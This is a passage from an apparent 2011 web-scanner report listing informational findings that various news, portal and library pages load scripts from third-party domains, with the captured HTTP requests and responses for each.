<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profile="http
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://static.jquery.com/org/style.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4/jquery.min.js"></script>
...[SNIP]...

23.137. http://jqueryui.com/about previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://jqueryui.com
Path:	/about

Issue detail

The response dynamically includes the following script from another domain:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js

Request

GET /about HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 29 Jan 2011 23:41:28 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 2
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>

   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<link rel="stylesheet" href="http://static.jquery.com/ui/css/base2.css" type="text/css" media="all" />
           <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js" type="text/javascript"></script>
...[SNIP]...

Summary

Severity:	Information
Confidence:	Certain
Host:	http://latino.aol.com
Path:	*/$\|.ivillage.com./1\|www.ivillage.com/(celeb-news\|entertainment-photos\|tv\|for-kids\|video\|entertainment\|movies\|food\|recipes\|table-talk\|food-for-kids\|food-advice\|food-news\|food-video**

Issue detail

The response dynamically includes the following scripts from other domains:

http://o.aolcdn.com/omniunih.js
http://portal.aolcdn.com/p/v32/63-main.js

Request

GET /$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video HTTP/1.1
Host: latino.aol.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 30 Jan 2011 02:09:09 GMT
Server: Apache-Coyote/1.1
Pragma: no-cache
Cache-Control: no-cache, no-store, private, max-age=0
Expires: 0
R-Host: portal-tc-lma05.websys.aol.com
x-ua-compatible: IE=EmulateIE7
Content-Type: text/html;;charset=utf-8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Length: 15581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" class="IE7"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://portal.aolcdn.com/skn/classic_v1/4-err.css" />
<script type="text/javascript" src="http://portal.aolcdn.com/p/v32/63-main.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://o.aolcdn.com/omniunih.js"></script>
...[SNIP]...

23.139. http://lifeinc.todayshow.com/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifeinc.todayshow.com
Path:	/_news/2011/01/28/5936478-good-graph-friday-what-cheat-on-taxes-never

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247
http://platform.twitter.com/widgets.js
http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247
http://www.polls.newsvine.com/_static/js/d1e431bda25a167e695fb05acc6e0492371d9a89.js?v=23247
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247
http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js

Request

Response

23.140. http://lifestyle.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET / HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.141. http://lifestyle.redacted/relationships/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /relationships/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.142. http://lifestyle.redacted/relationships/staticslideshowglamour.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/relationships/staticslideshowglamour.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

GET /relationships/staticslideshowglamour.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.143. http://lifestyle.redacted/your-home/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-home/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.144. http://lifestyle.redacted/your-home/room-design/staticslideshowhb.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-home/room-design/staticslideshowhb.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ads.hearstmags.com/ams/api.js?pos_name=AMS_MSN_HOST_HBU_585X368
http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

Response

23.145. http://lifestyle.redacted/your-life/family-parenting/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/family-parenting/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

Response

23.146. http://lifestyle.redacted/your-life/your-money-today/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js
http://img.widgets.video.s-redacted/js/embed.js
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

Response

23.147. http://lifestyle.redacted/your-life/your-money-today/video.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-life/your-money-today/video.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://amch.questionmarket.com/adsc/d853029/10/859690/randm.js

Request

GET /your-life/your-money-today/video.aspx HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.148. http://lifestyle.redacted/your-look/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-look/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.149. http://lifestyle.redacted/your-look/makeup-skin-care-hair/staticslideshowessence.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/makeup-skin-care-hair/staticslideshowessence.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://cache-01.cleanprint.net/cp/ccg?divId=2630
http://lifestyle.msn.us.intellitxt.com/ast/js/msn/msn_cs.js

Request

Response

23.150. http://lifestyle.redacted/your-look/video/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://lifestyle.redacted
Path:	/your-look/video/

Issue detail

The response dynamically includes the following script from another domain:

http://cache-01.cleanprint.net/cp/ccg?divId=2630

Request

GET /your-look/video/ HTTP/1.1
Host: lifestyle.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

23.151. http://live.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://live.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666
http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: live.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:16 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Host,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=3261f137f4e2f6857b19efea70ec8e5e; expires=Sat, 25-Jan-2031 17:54:16 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 18471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...
</div><script src="http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</div><script language="javascript" src="http://context3.kanoodle.com/cgi-bin/context.cgi?id=78053631&db=context&query=*general_network:premium&cgroup=newsvine&width=160&format=standard&numresults=4&linkcolor=993733&titlecolor=993733&title=1&textcolor=666666"></script>
...[SNIP]...

23.152. http://login.live.com/login.srf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://login.live.com
Path:	/login.srf

Issue detail

The response dynamically includes the following scripts from other domains:

http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js
http://js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js

Request

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 29 Jan 2011 23:47:54 GMT
Server: Microsoft-IIS/6.0
PPServer: PPV: 30 H: BAYIDSLGN1H24 V: 0
Content-Type: text/html; charset=utf-8
Expires: Sat, 29 Jan 2011 23:46:54 GMT
Cache-Control: no-cache
Pragma: no-cache
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
X-XSS-Protection: 0
Set-Cookie: MSPRequ=lt=1296344874&id=N&co=1; path=/;version=1
Set-Cookie: MSPOK=$uuid-01208158-4468-4c60-bed2-dee9dc622cce$uuid-af80d4b3-da4e-4da7-ad81-1b243509eccc$uuid-088a3b07-3c74-47a1-ba5d-84cb227ab8a1$uuid-f2f145b9-7949-4a38-9839-b8a7726474e0; path=/;version=1
X-Frame-Options: deny
Content-Length: 11332



<!-- RequestLCID: 1033, Market:EN-US, PrefCountry:
...[SNIP]...
</script><script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/Main_WLStrings_JS1033.js"></script>
<script type="text/javascript" src="http://Js.wlxrs.com/~Live.SiteContent.ID/~15.3.21/~/~/~/~/js/WLWorkflow.js"></script>
...[SNIP]...

23.153. http://malsup.com/jquery/cycle/lite/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://malsup.com
Path:	/jquery/cycle/lite/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js
http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.lite.1.0.min.js
http://malsup.github.com/chili-1.7.pack.js
http://www.google-analytics.com/urchin.js

Request

GET /jquery/cycle/lite/ HTTP/1.1
Host: malsup.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:23:45 GMT
Server: mod_security2/2.5.7
Last-Modified: Tue, 30 Mar 2010 03:07:07 GMT
ETag: "10ce04f-193b-482fbecbc2cc0"
Accept-Ranges: bytes
Content-Length: 6459
Vary: Accept-Encoding,User-Agent
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="Content-Style-Typ
...[SNIP]...
</style>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js"></script>
<script type="text/javascript" src="http://malsup.github.com/chili-1.7.pack.js"></script>
<script type="text/javascript" src="http://cloud.github.com/downloads/malsup/cycle/jquery.cycle.lite.1.0.min.js"></script>
...[SNIP]...
</div>
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
...[SNIP]...

23.154. http://michaelwann.newsvine.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://michaelwann.newsvine.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js
http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js
http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js
http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js

Request

GET / HTTP/1.1
Host: michaelwann.newsvine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 17:54:24 GMT
Server: Apache/2.2.9 (Debian)
Vary: negotiate,Accept-Encoding
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Set-Cookie: vid=cff2e2c6340336c92750514520f8f6d5; expires=Sat, 25-Jan-2031 17:54:24 GMT; path=/; domain=.newsvine.com
Pragma: no-cache
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 46172

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<meta http-equiv="Content-
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.7.0/build/assets/skins/sam/skin.css">
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/utilities/utilities.js&2.7.0/build/datasource/datasource-min.js&2.7.0/build/autocomplete/autocomplete-min.js&2.7.0/build/container/container-min.js&2.7.0/build/menu/menu-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/button/button-min.js&2.7.0/build/cookie/cookie-min.js&2.7.0/build/history/history-min.js&2.7.0/build/json/json-min.js&2.7.0/build/resize/resize-min.js&2.7.0/build/selector/selector-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.7.0/build/tabview/tabview-min.js"></script>
<script type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.0/build/event-delegate/event-delegate-min.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
...[SNIP]...

23.155. http://mlb.scout.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://mlb.scout.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://ads1.redacted/library/dap.js

Request

GET / HTTP/1.1
Host: mlb.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 30 Jan 2011 02:09:36 GMT
Server: Microsoft-IIS/6.0
Server: Static2
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
Accept-Ranges: bytes
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Sun, 30 Jan 2011 02:19:36 GMT
Last-Modified: Sat, 29 Jan 2011 23:57:57 GMT
ETag: "1CBC01059DF3080"
Content-Type: text/html
Content-Length: 27801

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html>
<head>
<title>MLB Team Directory Front Page</title>
<meta http-equiv="Con
...[SNIP]...
</script>
<script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...

23.156. http://money.redacted/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET / HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.157. http://money.redacted// previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	//

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

Response

23.158. http://money.redacted/auto-insurance/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/auto-insurance/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /auto-insurance/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: MC1=V=3&GUID=c08717139d004559bd4f0225c985624e; domain=.redacted; expires=Mon, 04-Oct-2021 19:00:00 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
S: CO1MPPRENM06
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Sat, 29 Jan 2011 23:48:12 GMT
Content-Length: 136393

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" dir="ltr" xmlns="http://www.w3.org/1999/xhtml"><head><link rel="stylesheet" type="text/css" href="http://img.widgets.video.s-redacted/js/ch/channels.css" media="all" /><script type="text/javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
</script><script type="text/javascript" src="http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js"></script>
...[SNIP]...

23.159. http://money.redacted/budgeting-savings previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/budgeting-savings

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /budgeting-savings HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.160. http://money.redacted/business-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /business-news HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.161. http://money.redacted/business-news/article.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/article.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js
http://www.businessweek.com/bwdaily/headlinefeed.js

Request

GET /business-news/article.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.162. http://money.redacted/business-news/news.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/business-news/news.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /business-news/news.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.163. http://money.redacted/common/commentary.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/common/commentary.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /common/commentary.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.164. http://money.redacted/common/finding-your-way-on-msn-money.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/common/finding-your-way-on-msn-money.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
http://img.widgets.video.s-redacted/js/embed.js

Request

GET /common/finding-your-way-on-msn-money.aspx HTTP/1.1
Host: money.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;

Response

23.165. http://money.redacted/common/sitemap.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://money.redacted
Path:	/common/sitemap.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.microsoft.com/ajax/4.0/1/MicrosoftAjax.js
